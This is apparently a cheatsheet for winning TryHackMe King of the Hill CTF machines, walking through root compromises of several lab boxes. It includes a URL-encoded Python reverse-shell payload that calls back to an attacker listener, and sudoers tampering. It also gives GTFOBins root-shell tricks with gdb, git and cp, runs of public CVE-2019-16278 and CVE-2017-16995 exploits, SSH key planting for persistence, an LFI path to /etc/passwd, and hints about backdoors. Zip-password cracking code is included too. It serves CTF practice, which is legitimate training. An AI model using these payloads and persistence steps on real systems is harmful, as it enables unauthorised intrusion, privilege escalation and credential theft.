This is a GitHub cheatsheet for owning the machines in TryHackMe's King of the Hill (KoTH) game.

Sorry, I am lazy AF; more machines will be added soon!

I am not posting the methods that are 'technically' better, I am posting the methods that are easiest to do and will get you the win. The target is to win while staying inside the rules. This is not an exam, there are no wrong answers. As the saying goes: if it works, don't touch it.
An nmap scan with `-p-` (all 65535 ports, not just the default top 1000) revealed telnet running on port 46969. The following steps get root ASAP:

- Connect to the port:

```bash
telnet <IP> 46969
```

- The username and password in the banner are Caesar-ciphered. Decoded, they are:
  Username: food
  Password: givemecookies
- After scanning the machine with linPEAS.sh, we found that the `vim.basic` binary can read and write privileged files, so use it to edit the sudoers file:

```bash
vim.basic /etc/sudoers
```

  Press `i`, then add this line after the line that starts with `root`:

```
food ALL=(ALL:ALL) ALL
```

  Press `Ctrl+[` (same as Esc), then type `:w!` and Enter, then `:q!` and Enter.
- Become root:

```bash
sudo su
```

  At the prompt enter food's password, i.e. givemecookies.
This is the first and a relatively easy machine, but beware: it has too many entry points to keep an eye on, so the best idea for defending it is to simply kill the other players' shells. Again, these are the easiest methods, not the technically best ones.
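The banner decoding from the steps above, as an added example that is not code from the original cheatsheet: a Caesar brute-forcer that tries all 25 keys and, given a crib word you expect in the banner (such as "password"), keeps only the keys whose output contains it. The CIPHERTEXT it runs on is constructed here from the creds the page lists; the real box prints its own banner.

```python
"""Brute-force a Caesar-shifted banner. Added example, not from the original cheatsheet;
CIPHERTEXT is constructed (key 7 over the page's creds), the real banner differs."""
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def caesar(text: str, key: int) -> str:
    """Shift letters by `key` positions (negative key decrypts); other characters pass through."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + key) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + key) % 26])
        else:
            out.append(ch)
    return "".join(out)


def brute_force(ciphertext: str, crib: str = "") -> dict:
    """Map every possible encryption key (1..25) to the plaintext it would give.
    With a crib (a word you expect, e.g. 'password') only matching keys are kept,
    so the right one stands out instead of being one of 25 lines to eyeball."""
    candidates = {k: caesar(ciphertext, -k) for k in range(1, 26)}
    if crib:
        candidates = {k: p for k, p in candidates.items() if crib.lower() in p.lower()}
    return candidates


# constructed: what the banner would look like if it had been encrypted with key 7
CIPHERTEXT = caesar("Username: food\nPassword: givemecookies", 7)

if __name__ == "__main__":
    for key, plain in brute_force(CIPHERTEXT, crib="password").items():
        print(f"key {key}:\n{plain}")
```

Paste the real banner in place of CIPHERTEXT; if no crib matches, call brute_force without one and read the 25 candidates.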
- An initial gobuster scan revealed that `robots.txt` contains an abnormal entry; navigating to it, we find an entire RSA private key.
- Copy the key, paste it into a file and give the file the permissions ssh insists on. Assuming you named the key file `id_rsa`:

```bash
chmod 600 id_rsa
ssh -i id_rsa shrek@<IP ADDRESS OF MACHINE>
```

  This gives you a shell as shrek.
- After scanning the machine with linPEAS.sh, we found that gdb on this box can be abused for privilege escalation. Using the GTFOBins entry for gdb, the following command gives a root shell:

```bash
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
```
This machine is a race to root: there is a very low-hanging fruit to get root, but it is a use-once entry, i.e. whoever uses it first will try their best to destroy it, as it is far too open.

- We can see that port 3000 is hosting a Node.js app openly, so we try to get a reverse shell from it. To do that, first start a listener on your machine:

```bash
ncat -lvnp 4444
```

  (I am using ncat since I am on an Arch-based system; you can use `nc` in place of ncat.)
- Once the listener is ready, we deploy the payload. After testing many payloads, we found the Python one to be working. For more payloads, follow this link. Replace `<REMOTE_IP>` with the IP of the box and `<LOCAL_IP>` with the IP of your TryHackMe VPN interface:

```bash
curl "<REMOTE_IP>:3000/?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22<LOCAL_IP>%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27"
```

  On the listener you can see that we have a shell now.
- After a lot of tests and linPEAS, I found that the easiest way to get king AND a root shell is to abuse the `cp` vulnerability on the box. I am leaving the root-shell ideas to you, but here is how to make yourself king:

```bash
LFILE=/root/king.txt
echo "<YOUR USERNAME>" | cp /dev/stdin "$LFILE"
```

  Free tip: you can read any file with this vuln, use your imagination.

```bash
LFILE=file_to_read
cp "$LFILE" /dev/stdout
```
Now this is a new machine, released very recently, and it made it hard for me to post direct commands. Why? In this machine there is a thing called an autogen script that regenerates everything at every reset. That means hard-coded credentials don't work anymore, so you have to follow the instructions and do everything manually.

Let's hack:

- When we connect to it, it prints a weird base64 blob. After fiddling around, I found that it is the base64 encoding of a zip file, so we use this site: paste the base64 into it and it generates a file named application.zip.
- When we try to open the file, it asks for a password. Just crack it with fcrackzip and the rockyou.txt wordlist:

```bash
fcrackzip -v -u -D -p ~/wordlists/rockyou.txt application.zip
```

  Once you have the password, unzip it:

```bash
unzip application.zip
```

  Or do all of it in one go from the shell. Paste the base64 blob into file.txt and set `location` to the directory that holds your rockyou.txt:

```bash
location=~/wordlists
base64 -d file.txt > test.zip
unzip -P "$(fcrackzip -v -u -D -p "$location/rockyou.txt" test.zip | grep "pw" | awk '{print $5}')" test.zip
cat creds.txt
```

- You get a file named creds.txt; inside it are the login details of the user fortuna. Let's go.
- Using the creds:

```bash
ssh fortuna@<BOX IP>
```

- Now that we have the shell, we can work on privilege escalation. After linPEAS and basic tests, I found that:
  - we as fortuna are in the sudoers list, and
  - `pico` is in the `sudo -l` list.
- So we can simply edit the `/etc/sudoers` file to give ourselves ALL permissions to run sudo:

```bash
sudo pico /etc/sudoers
```

  In the sudoers file, replace `pico` with `ALL`.
- Now you can just do:

```bash
sudo su
```

  and you are root.
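The banner-to-creds step of this machine done offline with the Python standard library, as an added example that is not code from the original cheatsheet: zipfile's own password check stands in for fcrackzip. Everything it runs on is constructed in the block itself, because the box regenerates its data on every reset: the banner is generated from a throwaway creds.txt protected with the password "sunshine", and the four-word WORDLIST stands in for rockyou.txt. The ZipCrypto writer at the top exists only because zipfile can read traditional-encryption archives but not create them.

```python
"""Decode the banner's base64 blob into a zip, dictionary-attack its ZipCrypto password with
the stdlib instead of fcrackzip, and read creds.txt. Added example, not from the original
cheatsheet: BANNER, WORDLIST, the password "sunshine" and CREDS are constructed test data."""
import base64, io, struct, textwrap, zipfile, zlib

# --- ZipCrypto keystream (APPNOTE 6.1). Only needed to BUILD the test archive, because
# zipfile can read traditional-encryption entries but cannot write them.
_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc_step(crc, byte):
    return (crc >> 8) ^ _CRC_TABLE[(crc ^ byte) & 0xFF]


class ZipCrypto:
    def __init__(self, password):
        self.k = [0x12345678, 0x23456789, 0x34567890]
        for b in password:
            self._update(b)

    def _update(self, b):
        k = self.k
        k[0] = _crc_step(k[0], b)
        k[1] = ((k[1] + (k[0] & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        k[2] = _crc_step(k[2], k[1] >> 24)

    def encrypt(self, data):
        out = bytearray()
        for b in data:
            t = self.k[2] | 2
            out.append(b ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(b)  # the key schedule advances on the plaintext byte
        return bytes(out)


def make_encrypted_zip(name, data, password):
    """One stored (uncompressed) entry with general-purpose flag bit 0 (encrypted) set."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header; its last byte must equal the CRC high byte (the check byte)
    body = ZipCrypto(password).encrypt(bytes(range(11)) + bytes([crc >> 24]) + data)
    dos_date = ((2024 - 1980) << 9) | (1 << 5) | 1
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, 1, 0, 0, dos_date,
                        crc, len(body), len(data), len(name), 0) + name + body
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, 1, 0, 0, dos_date,
                          crc, len(body), len(data), len(name), 0, 0, 0, 0, 0, 0) + name
    end = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + end


# --- the part you run against the box's real output
def banner_to_zip(blob):
    """base64 -> bytes, tolerating the line wrapping a terminal adds; refuses non-zip data."""
    raw = base64.b64decode("".join(blob.split()), validate=True)
    if raw[:4] != b"PK\x03\x04":
        raise ValueError("decoded data does not start with a zip local file header")
    return raw


def crack_zip(zip_bytes, wordlist):
    """Return the first candidate (bytes) that opens the first entry, else None. A wrong
    password normally fails the 1-byte check (RuntimeError); about 1 in 256 wrong
    passwords pass that check and only fail the CRC of the decrypted data (BadZipFile)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        name = zf.namelist()[0]
        for cand in wordlist:
            try:
                zf.read(name, pwd=cand)
                return cand
            except (RuntimeError, zipfile.BadZipFile):
                continue
    return None


def recover_creds(banner, wordlist):
    """(password, creds.txt contents) or None if the wordlist does not contain the password."""
    data = banner_to_zip(banner)
    pw = crack_zip(data, wordlist)
    if pw is None:
        return None
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return pw, zf.read("creds.txt", pwd=pw)


# constructed fixture: what the box would print if the archive were protected with "sunshine"
CREDS = b"fortuna:not-the-real-password\n"
BANNER = "\n".join(textwrap.wrap(
    base64.b64encode(make_encrypted_zip(b"creds.txt", CREDS, b"sunshine")).decode(), 64))
WORDLIST = [b"123456", b"password", b"sunshine", b"princess"]  # stand-in for rockyou.txt

if __name__ == "__main__":
    print(recover_creds(BANNER, WORDLIST))
```

Against the real box, paste the blob into `banner_to_zip` and pass the stripped lines of rockyou.txt (opened in binary mode) as the wordlist. fcrackzip is much faster on the full list; the point here is the check-byte and CRC behaviour that makes a wrong password fail, which is the same mechanism fcrackzip relies on.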
This machine is one of the easiest ones.

- Basic enumeration will get you the password / ssh id_rsa key of the user Ashu.
- Once you are in the machine as Ashu, check `sudo -l`; you will see that you can run `su` for the user skiddy without a password.
- After `sudo su skiddy` you are in skiddy's shell.
- We don't need to enumerate this machine any more: `sudo -l` shows that we can run `git` as sudo.
- Using GTFOBins, we see that the following commands give us a root shell (the first opens git's help in a pager, the second is typed into that pager):

```bash
sudo git -p help config
!/bin/sh
```

  Now `id`: voila, you are root.

P.S. Food for thought: there are two interesting ports open on the machine, see if you can set up backdoors for yourself ;)
- After the nmap scan we can see that, weirdly, there is no SSH on the machine, but nostromo is present on port 8080. Later, after a complete scan, we found that SSH has been moved to port 1337.
- Searching for this service, we found that this specific nostromo version is vulnerable to CVE-2019-16278.
- Simply downloading the exploit from Exploit-DB, we can get RCE on the machine. Note: this exploit is Python 2 based.

```bash
python2 cve2019-16278.py <KOTH MACHINE IP> 8080 "whoami"
```

  Online there are methods to use this CVE to get a reverse shell, but for some weird reason I was not able to get a reverse shell from it. So here's my workaround: first we generate an ssh key pair on our machine, then, since we have RCE, we add the public key to the target's authorized_keys.
- Generate the keys:

```bash
ssh-keygen
```

- Getting into authorized_keys: we need the contents of the *.pub file, which is a single line starting with the key type (ssh-rsa, ssh-ed25519, ...) followed by the base64-encoded key. Now use this command:

```bash
python2 cve2019-16278.py <KOTH IP> 8080 "mkdir /home/gloria/.ssh; echo '<YOUR *.pub file data>' > /home/gloria/.ssh/authorized_keys"
```

- Now we can simply ssh into the machine with our key (`sshkey` being whatever name you gave the private key file when ssh-keygen asked):

```bash
ssh -i sshkey gloria@<KOTH BOX IP> -p 1337
```

  Since our key is in authorized_keys, we are logged in without a password.
- Since we have a shell, priv esc is the next step. After some LinPEAS and LinEnum, I found that this box's kernel is vulnerable to CVE-2017-16995.
- So we download the exploit from Exploit-DB, and here's a little trick to save compile time on the remote machine: instead of uploading the source and compiling it there, build it with `-static` in gcc to get a binary that does not depend on the target's libc and is usable everywhere:

```bash
gcc -static cve-2017-16995.c -o cve-2017-16995 && chmod +x cve-2017-16995
```

- Now just upload the binary to the remote box and run it to get root.

P.S. If you are locked out and forgot to make a backdoor, here's food for thought: there is an LFI at this address,

```
http://lion.thm:5555/?page=php://filter/convert.base64-encode/resource=../../../../etc/passwd
```

where lion.thm is the hostname you mapped to the machine's IP in your hosts file ;) (Maybe you can get an id_rsa.)